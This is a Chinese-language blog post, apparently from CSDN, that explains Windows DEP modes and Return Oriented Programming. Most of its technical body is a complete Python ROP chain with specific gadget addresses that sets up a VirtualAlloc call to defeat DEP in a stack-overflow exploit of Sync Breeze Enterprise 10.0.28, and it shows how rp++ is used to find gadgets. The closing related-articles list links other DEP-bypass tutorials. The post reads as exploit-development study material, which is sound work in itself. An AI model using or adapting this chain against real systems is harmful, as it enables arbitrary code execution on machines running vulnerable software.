DEP Bypass - ROP

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量678 收藏 8
点赞数 20
分类专栏: x86逆向 文章标签: 安全威胁分析 安全 网络安全 windows 威胁分析 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/faint23/article/details/139161271
版权
  • 使用 Sync Breeze Enterprise 10.0.28 用于测试对象.
  • 由于 Sync Breeze Enterprise 10.0.28 未导入VirtualAlloc, 使用GetLastError地址替换.

DEP 简介

DEP 总共有4种模式.
  • OptIn: DEP 只对系统进程和指定进程开启.
  • OptOut: DEP 对所有进程开启,除非指定了特定进程不开启.
  • AlwaysOn : DEP 始终开启.
  • AlwasysOff : DEP 始终关闭.
  • win7 和 win10 默认使用 OptIn. windows Server 2012 或 Windows Server 2019 默认使用AlwaysOn.
为了兼容性问题, 有些情况下可以对进程开启或关闭 DEP
  • LdrpCheckNXCompatibility 用于检查以确定是否应为进程启动DEP支持. (ntdll.dll)
  • NtSetInformationProcess 用于是开启或禁用正在运行的进程的DEP. (ntdll.dll)
win10 强制开启指定进程DEP

安全中心 -> 打开Windows安全中心 -> 应用和浏览器控制 -> Exploit Protection -> 程序设置 -> 添加程序自定义 -> 数据执行保护(DEP)

  • 编译过程中加入 /NXCOMPAT标志 , 在进程运行期间无法禁用DEP.
  • 这意味着在整个过程中无法关闭 DEP, 那么唯一的选择就是规避系统的NX检查.

Return Oriented Programming (ROP)

ROP 原理是用程序中己有的代码片段来组成可执行的代码链.
通过将不同代码片段地址注入到栈中, 使用RET来控制程序流程.
最终调用 VirtualAlloc,VirtualProtect 等函数改写内存权限执行Shellcode.

> 假设栈内数据如下的情况下,代码会依次执行. 使用栈来控制RET的跳转.

  ESP 0 -> 0x1013fc06  	# xor eax, eax ; ret ;
  ESP 4 -> 0x101229f2	# inc eax ; ret ;
  ESP 8 -> 0x10114901	# mov  [ecx], eax ; ret ;
使用rp++获取Gadgets
- https://github.com/0vercl0k/rp
- rp-win-x86.exe -f Test.exe -r 5 > rop.txt
使用VirtualAlloc改变虚拟地址属性
 LPVOID WINAPI VirtualAlloc(
   _In_opt_ LPVOID lpAddress,
   _In_     SIZE_T dwSize,
   _In_     DWORD  flAllocationType,
   _In_     DWORD  flProtect
 );
  • pAddress: 如果指向己分配页面,则可以使用flProtect改变页面属性.
  • dwSize: 以页为单位 Shellcode如果小于0x1000字节, dwSize在0x01~0x1000之间即可.
  • flAllocationType: 必须设置为MEM_COMMIT (0x00001000).
  • flProtect: 必须设置为PAGE_EXECUTE_READWRITE (0x00000040).
调用栈信息
  • 将以下栈数据放到溢出EIP之前.
0d2be300 75f5ab90 -> KERNEL32!VirtualAllocStub (kernel32.dll符号表中名字为VirtualAllocStub)
0d2be304 0d2be488 -> Return address (Shellcode on the stack)
0d2be308 0d2be488 -> lpAddress (Shellcode on the stack)
0d2be30c 00000001 -> dwSize
0d2be310 00001000 -> flAllocationType
0d2be314 00000040 -> flProtect
需要解决的问题
  • 得到栈地址 (通过PUSH ESP; POP REGISTER; 来获取)
  • 得到 VirtualAlloc 地址 (通过IAT表获得)
  • 得到 Shellcode 地址 (通过计算溢出数据来计算)
  • dwSize, flAllocation Type和 flProtect 包含0x00字符. (通过负数运算,自增,自减,取反等方式写入)
参考代码
  #-----------调用框架----------
  va = pack('<L', 0x45454545)	# KERNEL32!VirtualAllocStub
  va += pack('<L', 0x46464646)	# Return address (Shellcode on the stack)
  va += pack('<L', 0x47474747)	# lpAddress (Shellcode on the stack)
  va += pack('<L', 0x48484848) 	# dwSize
  va += pack('<L', 0x49494949) 	# flAllocationType
  va += pack('<L', 0x51515151)	# flProtect

  #-----------得到栈地址----------
  eip = pack('<L', 0x10154112)	# push esp ; inc ecx ; adc eax, 0x08468B10 ; pop esi ; ret ; (将ESP地址赋值给ESI)
  rop = pack("<L", 0x41414141)	# offset (栈偏移对齐,根据漏洞情况而定)
  rop += pack('<L', 0x10052048)	# mov eax, esi ; pop esi ; retn 0x0004 ; (将ESP地址赋值给EAX(EAX 操作指令更多))
  rop += pack("<L", 0x41414141)	# alignment pop esi
  
  #-----------得到VA地址 (esp - 20)----------
  rop += pack("<L", 0x10154336)	# pop ebp ; ret ;
  rop += pack("<L", 0x41414141)	# alignment retn 0x0004 (先RET然后ESP+4)
  rop += pack("<L", 0xFFFFFFE0)	# -0x00000020 = 0xFFFFFFE0
  rop += pack("<L", 0x100fcd71)	# add eax, ebp ; dec ecx ; ret ;(eax = esp - 0x20 指向VA栈顶)
  rop += pack("<L", 0x100baecb)	# xchg eax, ecx ; ret ; 
  
  #-----------写入函数地址到 VA (esp - 20)----------
  rop += pack("<L", 0x1002f729)	# pop eax ; ret ; (eax = GetLastError IAT Address)
  rop += pack("<L", 0x10168040)	# GetLastError IAT Address
  rop += pack("<L", 0x1014dc4c)	# mov eax,  [eax] ; ret ; (eax = GetLastError 虚拟地址)		 
  rop += pack("<L", 0x10114901)	# mov [ecx], eax ; retn 0x000C ; (GetLastError 虚拟地址 写入VA栈顶)
  
  #-----------写入返回地址到 VA + 4 (esp - 20)----------
  rop += pack("<L", 0x10152f51)	# mov eax, ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10154336)	#  pop ebp ; ret ;
  rop += pack("<L", 0xFFFFFEB8)	# -0n328 = 0xFFFFFEB8
  rop += pack("<L", 0x1014c168)	# sub eax, ebp ; pop esi ; pop ebp ; pop ebx ; ret ; (shellcode偏移,大小根据情况而定)
  rop += b"A" * 0xC				# alignment 3 pop
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ; (VA + 4 = Return address (Shellcode on the stack))
  rop += pack("<L", 0x10114901)	# mov  [ecx], eax ; retn 0x000C ;
  
  #-----------写入lpAddress到地址 VA + 8 (esp - 18)----------
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ; 
  rop += pack("<L", 0x10114901)	# mov  [ecx], eax ; retn 0x000C ; (VA + 4 = lpAddress address (Shellcode on the stack))
  
  #-----------写入dwSize到地址 VA + C (esp - 14)----------
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ; 
  rop += pack("<L", 0x1013fc06)	# xor eax, eax ; ret ;
  rop += pack("<L", 0x101229f2)	# inc eax ; ret ;
  rop += pack("<L", 0x10114901)	# mov  [ecx], eax ; retn 0x000C ; (VA + 8 = dwSize)
  
  #-----------写入flAllocationType到地址 VA + 10 (esp - 10)----------
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ; 
  rop += pack("<L", 0x1002f729)	# pop eax ; ret ;
  rop += pack("<L", 0xFFFFEFFF)	# -0x00001000 = 0xFFFFEFFF
  rop += pack("<L", 0x1010ccc3)	# neg eax ; ret ;
  rop += pack("<L", 0x10114901)	# mov  [ecx], eax ; retn 0x000C ; (VA + C = flAllocationType)
  
  #-----------写入flProtect到地址 VA + 14 (esp - C)----------
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ;
  rop += pack("<L", 0x10027201)	# inc ecx ; ret ; 
  rop += pack("<L", 0x1002f729)	# pop eax ; ret ;
  rop += pack("<L", 0xFFFFFFC0)	# 0x00000040 = 0xFFFFFFC0
  rop += pack("<L", 0x1010ccc3)	# neg eax ; ret ;
  rop += pack("<L", 0x10114901)	# mov  [ecx], eax ; retn 0x000C ; (VA + 10 = flProtect)
  
  #-----------调用函数 KERNEL32!VirtualAllocStub----------
  rop += pack("<L", 0x10152f51)	# mov eax, ecx ; ret ;
  rop += b"A" * 0xC				# alignment retn 0x000C
  rop += pack("<L", 0x10154336)	# pop ebp ; ret ;
  rop += pack("<L", 0xFFFFFFEC)	# 0n20 = FFFFFFEC 
  rop += pack("<L", 0x100fcd71)	# add eax, ebp ; dec ecx ; ret ; (还原EAX地址到VA栈顶)
  rop += pack("<L", 0x10158c35)	# xchg eax, esp ; ret ; (将VA栈顶地址赋值给ESP)

DEP Bypass 参考
Sync Breeze Enterprise 10.0.28 栈溢出参考

faint23
关注
  • 20
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ret2lib bypass dep 学习笔记(0day2Edition NtSetInformationProcess)
Catch me if you can
04-21 2333
DEP绕过ROP(ret2lib)技术总结样本空间测试环境 操作系统:windows xp sp3 工具:immunity debugger 样本源码: #include <stdio.h> #include <string.h> #include <windows.h> char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x
dep6-webpos-bootstrap
03-19
在"dep6-webpos-bootstrap-master"这个压缩包中,我们可以预见到以下关键知识点: 1. **HTML基础**:HTML(HyperText Markup Language)是网页开发的基础,定义了网页的结构和内容。在这个项目中,HTML文件将作为...
tomkeeper 的DEP/ASLR bypass without ROP/JIT
thesum的专栏
01-14 592
https://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf
利用ROP绕过DEP(Defeating DEP with ROP)调试笔记
weixin_33947521的博客
03-08 812
Debug_Orz · 2014/11/05 10:190x00 背景本文根据参考文献《Defeating DEP with ROP》,调试vulserver,研究ROP (Return Oriented Programming)基本利用过程,并利用ROP绕过DEP (Data Execution Prevention),执行代码。 0x00 ROP概述 缓冲区溢出的目的是为了控制EIP,从而执行...
bypass dep egg hunter
thesum的专栏
05-01 709
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ #------------------------------------------------------------------- #corelanc0
【缓冲区溢出】EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech
Catch me if you can
04-25 1640
使用rop绕过dep,关键函数setProcessDEPPolicy。 测试报告。
一步一步学ROP之Linux_X86-蒸米大神
qq_43430261的博客
04-23 703
记录跟着蒸米大神一步一步学ROP之Linux_x86学习ROP的过程,在进行复现的时候,遇到了一些问题,文章中会体现出来。 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86...
[zz]DEP bypass with SetProcessDEPPolicy()
weixin_34067049的博客
05-31 196
/* This is a proof of concept of buffer overflow exploitation with DEP bypass on Windows XP Professional SP3 english updated on December 9, 2009 with DEP manually set to OptOut so e...
利用WPN与ROP绕过DEP保护机制
如鹿渴慕泉水的专栏
05-04 1381
利用WPN与ROP绕过DEP保护机制作者:Sud0译者:riusksk (泉哥:http://riusksk.blogbus.com) 前言对于本教程,假设读者具备以下条件:1. 在电脑拥有各项所需工具的实验环境;2. 具备编写栈溢出利用程序的基础;3. 掌握SEH概念及利用SEH编写exploit的基础知识。 基础概念DEP(Data Execution Prevention):防止一些内存位置...
Universal DEP/ASLR bypass with msvcr71.dll and mona.py
thesum的专栏
05-01 619
转载自: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ Introduction Over the last few weeks, there has been some commotion about a universal
selenium junit-dep-4.11
12-17
selenium junit-dep-4.11
PyPI 官网下载 | rikaard-dep2-depends-rikaard-dep1-0.0.7.tar.gz
02-10
标题中的"PyPI 官网下载 | rikaard-dep2-depends-rikaard-dep1-0.0.7.tar.gz"表明这是一个在Python的包管理平台PyPI上可下载的压缩文件,用于软件依赖管理。PyPI(Python Package Index)是Python开发者发布自己...
DEP4E-开源
04-13
DEP4E将DocBook XML和DocBook XSL集成到Eclipse IDE中,以创建,编辑和处理DocBook项目。
dep-size-inspect
04-25
《深入剖析JavaScript依赖大小检查工具"dep-size-inspect"》 在现代Web开发中,JavaScript作为前端的主要语言,其依赖管理对于项目性能至关重要。"dep-size-inspect"是一款专为JavaScript开发者设计的工具,用于...
强敌环伺:金融业信息安全威胁分析——整体态势
AKAMAI_CHINA的博客
01-29 1082
在Web应用程序和API攻击、零日漏洞以及DDoS攻击等方面,金融服务业一直是最主要的三大被攻击目标垂直行业之一。金融服务业的Web应用程序和API攻击数量同比激增3.5倍,在所有主要行业中增速最快。如何阻止Web应用程序和API攻击利用新发现的零日漏洞针对金融服务业发起的攻击,在24小时内就可以轻松达到每小时数千次的规模,并且会快速达到峰值,这使得防御者几乎没时间打补丁或做出反应。
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 436
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 307
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1380
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
sudo dnf builddep tpm2-tss
11-22
`sudo dnf builddep tpm2-tss` 是一个在 Fedora 发行版中使用的命令,用于安装构建 tpm2-tss 软件包所需的依赖项。 首先,`sudo` 是一个命令,用于以管理员权限运行后续的命令。 `dnf` 是 Fedora 发行版中的包管理器,用于安装、更新和删除软件包。 `builddep` 是 `dnf` 的一个子命令,用于安装构建软件包所需的依赖项。 `tpm2-tss` 是一个软件包的名称,该软件包提供 TPM(Trusted Platform Module)2.0 的软件实现。 所以,运行命令 `sudo dnf builddep tpm2-tss` 将自动查找并安装构建 tpm2-tss 软件包所需的所有依赖项,以便能够成功编译和构建该软件包。 使用此命令可以方便地为 Fedora 系统中的 tpm2-tss 软件包设置开发环境,并提供了所需的构建工具和依赖项,以支持使用 TPM 功能的应用程序的开发和使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值